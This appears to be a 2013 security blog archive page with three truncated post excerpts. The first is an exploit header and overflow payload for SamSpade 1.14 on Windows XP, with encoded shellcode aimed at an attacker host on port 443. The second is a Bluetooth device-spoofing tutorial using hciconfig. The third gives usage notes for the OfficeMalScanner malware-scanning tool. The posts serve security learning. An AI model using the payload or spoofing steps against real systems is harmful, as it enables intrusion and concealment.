Skip to main content

Posts

Showing posts from December, 2013

SAMSPADE BUFFER OVERFLOW VULNERABILITY

# Exploit Title: SAMSPADE 1.14 BUFFER OVERFLOW # Date: 10-12-2013 # Exploit Author: VISHAL MISHRA & NIDHI VERMA # Vendor Homepage: http://www.samspade.org/ # Software Link: http://www.majorgeeks.com/mg/getmirror/sam_spade,1.html # Version: 1.1.4 (beta) # Tested on: WINDOWS XP(sp2) TARGET: windows xp(sp2) ip:192.168.117.129 ATTACKER: backtrack     ip:192.168.117.131      PORT:443 Payload: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAj4?wTYIITYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlXhMYGpGpEPQpMYM5EaXRE4LKRrP0LKRrVl…

Spoofing Bluetooth Device Information

Step1: $hciconfig
Like ifconfig and iwconfig for bluetooth we have hciconfig that enumerate bluetooth interfaces in an system with a little info about that card like MAC,MTU and interface name.




Step2:$hciconfig -a hci0
So now we known we have a bluetooth interface card hci0.It may be anyone hci0,hci1 etc. Now as you can see below in the output that this bluetooth device is using OS name as its name own name. We will change this info so that some person might not enumerate any info about our bluetooth device.
                                               Class is a 24 bit or 6 hex number based identity for bluetooth devices. Class entity defines that bluetooth device is of which hardware class i.e
1)0x78020c is class of Phone/Smart phone,
2)0x6e0100 is class of computer etc.
Now will try to change this default class and name of our bluetooth device.



Step3:$hciconfig -a hci0 features
This command will tell what features our card support.



Step4: $hciconfig -a hci0 name 'aLt' class 0x…

OfficeMalScanner Tutorial

+------------------------------------------+ |           OfficeMalScanner v0.61         | |  Frank Boldewin / www.reconstructer.org  | +------------------------------------------+
Usage:
--------
OfficeMalScanner <PPT, DOC or XLS file> <scan | info> <brute> <debug>

Options:
scan    - scan for several shellcode heuristics and encrypted PE-Files
info    - dumps OLE structures, offsets+length and saves found VB-Macro code
inflate - decompresses Ms Office 2007 documents, e.g. docx, into a temp dir
Switches: (only enabled if option "scan" was selected)
brute - enables the "brute force mode" to find encrypted stuff
debug - prints out disassembly resp hexoutput if a heuristic was found

If you use ubuntu with wine on it then type following command in terminal "wine cmd.exe" to reach a window prompt from where you can run OfficeMalScanner


OfficeMalScanner Output


Click Hereto download test.doc